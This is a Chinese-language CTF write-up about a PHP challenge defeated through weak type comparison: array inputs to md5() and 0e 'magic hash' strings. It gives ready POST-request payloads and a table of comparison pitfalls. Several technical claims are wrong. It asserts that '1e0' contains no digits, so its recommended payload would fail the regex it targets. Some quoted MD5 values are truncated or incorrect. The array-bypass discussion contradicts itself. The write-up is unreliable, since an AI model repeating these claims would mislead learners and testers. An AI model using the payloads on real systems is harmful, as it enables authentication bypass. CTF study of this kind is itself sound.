一、漏洞背景介绍
在 CTF(Capture The Flag)竞赛和 Web 安全测试中,PHP 语言的类型比较漏洞是常见的考点。这类漏洞源于 PHP 的弱类型特性,即当使用==进行比较时,PHP 会自动进行类型转换,从而导致一些不符合预期的比较结果。本文将通过分析一道具体的 PHP 代码题目,深入探讨这类漏洞的原理和利用方法。
二、题目代码分析
我们先来看一下题目给出的 PHP 代码:
<?php
highlight_file(__FILE__);
include_once('flag.php');
if(isset($_POST['a'])&&!preg_match('/[0-9]/',$_POST['a'])&&intval($_POST['a'])){if(isset($_POST['b1'])&&$_POST['b2']){if($_POST['b1']!=$_POST['b2']&&md5($_POST['b1'])===md5($_POST['b2'])){if($_POST['c1']!=$_POST['c2']&&is_string($_POST['c1'])&&is_string($_POST['c2'])&&md5($_POST['c1'])==md5($_POST['c2'])){echo $flag;}else{echo "yee";}}else{echo "nop";}}else{echo "go on";}
}else{echo "let's get some php";
}
?>
2.1 条件逐层分析
这段代码通过四重条件判断来控制 flag 的输出,我们需要逐一分析每个条件的要求:
第一层条件:
isset($_POST['a']) && !preg_match('/[0-9]/', $_POST['a']) && intval($_POST['a'])
必须存在 POST 参数a
a的值不能包含任何数字字符
a的值被转换为整数后必须为真(即非零)
第二层条件:
isset($_POST['b1']) && $_POST['b2']
必须存在 POST 参数b1和b2
第三层条件:
$_POST['b1'] != $_POST['b2'] && md5($_POST['b1']) === md5($_POST['b2'])
b1和b2的值不能相等
但它们的 MD5 哈希值必须严格相等(使用===比较)
第四层条件:
$_POST['c1'] != $_POST['c2'] && is_string($_POST['c1']) && is_string($_POST['c2']) && md5($_POST['c1']) == md5($_POST['c2'])
c1和c2的值不能相等
它们都必须是字符串类型
它们的 MD5 哈希值必须宽松相等(使用==比较)
三、漏洞利用原理
3.1 第一层条件绕过:非数字的整数
第一个挑战是如何让一个字符串不包含数字,但转换为整数后却非零。PHP 的类型转换规则为我们提供了突破口。当一个字符串被转换为整数时,PHP 会从字符串的开始处提取数字部分,直到遇到非数字字符为止。如果字符串以非数字字符开头,则转换结果为 0。
解决方案:使用科学计数法表示数字。例如,字符串1e0在 PHP 中会被解释为1 * 10^0 = 1,但它并不包含数字字符0-9,因为e在科学计数法中是合法的指数符号。
验证代码:
<?php
var_dump(preg_match('/[0-9]/', '1e0')); // bool(false)
var_dump(intval('1e0')); // int(1)
?>
除了使用科学计数法,还可以利用 PHP 数组的特性绕过第一个条件。当$_POST[‘a’]是一个数组时:
preg_match('/[0-9]/', $_POST['a'])会返回false(即不匹配)
因为preg_match期望的参数是字符串,当传入数组时会触发警告,但返回值为0(表示不匹配)
intval($_POST['a'])会返回0
因为数组转换为整数时结果为0
矛盾点:虽然preg_match检查通过了,但intval($_POST[‘a’])返回0,而第三个条件要求转换结果为真(非零)。这看似是一个矛盾,但实际情况中可能存在两种解释:
PHP 版本差异:在某些 PHP 版本中,数组转换为布尔值时可能被视为true
测试代码:
<?php
$a = array('a');
var_dump((bool)$a); // 通常输出bool(true)
var_dump(intval($a)); // 输出int(0)
?>
但在条件表达式中,intval($a)明确返回0,这应该导致条件失败。因此这种解释可能不成立。
代码逻辑漏洞:出题者可能忽略了数组对preg_match的影响
当传入a[]=a时,虽然intval返回0,但出题者可能误以为数组转换为整数会得到非零值
实际测试:在大多数 PHP 环境中,a[]=a会导致第一个条件失败。但如果题目环境存在特殊配置(如错误抑制符@屏蔽了preg_match的警告),这种绕过方式可能有效。
建议:在实际 CTF 题目中,如果遇到类似情况,两种方法都应该尝试:
- 使用科学计数法a=1e0(通用有效)
- 尝试数组绕过a[]=a(可能在特定环境中有效)
3.2 第二层条件绕过:数组的 MD5 哈希
第二个挑战是找到两个不同的值,它们的 MD5 哈希值严格相等。PHP 在处理数组的哈希函数(如 md5 ()、sha1 ())时有一个特殊行为:当传入的参数是数组时,这些函数会返回NULL。
解决方案:使用数组作为参数。例如:
<?php
$b1 = array(1);
$b2 = array(2);
var_dump($b1 != $b2); // bool(true)
var_dump(md5($b1) === md5($b2)); // bool(true),因为md5($b1)和md5($b2)都为NULL
?>
3.3 第三层条件绕过:MD5 碰撞与弱类型比较
第三个挑战是找到两个不同的字符串,它们的 MD5 哈希值在宽松比较下相等。这需要利用 PHP 的弱类型特性和特定的 MD5 碰撞字符串。
当使用==比较两个字符串时,如果它们看起来像科学计数法表示的数字(即0e开头,后面跟着数字),PHP 会将它们解释为 0 的幂,因此所有这种形式的字符串在宽松比较下都相等。
解决方案:使用特定的 MD5 碰撞字符串。例如:
QNKCDZO的 MD5 值是0e83040045199349405802421990339
QLTHNDT的 MD5 值是0e40596782540195537254913908420
验证代码:
<?php
$c1 = "QNKCDZO";
$c2 = "QLTHNDT";
var_dump($c1 != $c2); // bool(true)
var_dump(is_string($c1) && is_string($c2)); // bool(true)
var_dump(md5($c1) == md5($c2)); // bool(true)
?>
四、完整 POC 与利用
方案一:科学计数法(推荐)
POST / HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 71a=1e0&b1[]=1&b2[]=2&c1=QNKCDZO&c2=QLTHNDT
方案二:数组绕过(特定环境可能有效)
POST / HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 71a[]=a&b1[]=1&b2[]=2&c1=QNKCDZO&c2=QLTHNDT
标题五、扩展知识点
5.1 PHP 弱类型比较总结
PHP 的弱类型比较是一个常见的安全风险点。下表总结了一些常见的弱类型比较陷阱:
| 表达式 | 结果 | 原因 |
|---|---|---|
0 == "0" | true | 字符串 "0" 被转换为整数 0 |
0 == "abc" | true | 字符串 "abc" 转换为整数 0 |
"10" == "010" | false | 字符串比较不进行类型转换 |
10 == "010" | true | 字符串 "010" 被转换为整数 10 |
md5("240610708") == md5("QNKCDZO") | true | 两个 MD5 值都是 0e 开头的字符串,在宽松比较下相等 |
sha1("aaroZmOk") == sha1("aaK1STfY") | true | 两个 SHA1 值都是 0e 开头的字符串,在宽松比较下相等 |
5.2 更多 MD5 碰撞字符串
除了前面提到的QNKCDZO和QLTHNDT,还有许多其他的 MD5 碰撞字符串对,例如:
240610708 和 QNKCDZO
aabg7XSs 和 aabC9RqS
这些字符串对的 MD5 值都是0e开头,因此在 PHP 的宽松比较下相等。
六、总结
通过分析这道 CTF 题目,我们深入了解了 PHP 弱类型比较漏洞的原理和利用方法。这类漏洞虽然在现代 PHP 应用中已经较少见,但在一些老旧系统或代码中仍然可能存在。理解这些漏洞的工作原理,不仅有助于我们在安全测试中发现问题,也能指导我们写出更安全的 PHP 代码。
在实际渗透测试和 CTF 竞赛中,遇到类似的多条件验证题目时,我们需要逐一分析每个条件的绕过方法,结合编程语言的特性和漏洞利用技巧,构造出能够通过所有验证的 POC。
)
)
)
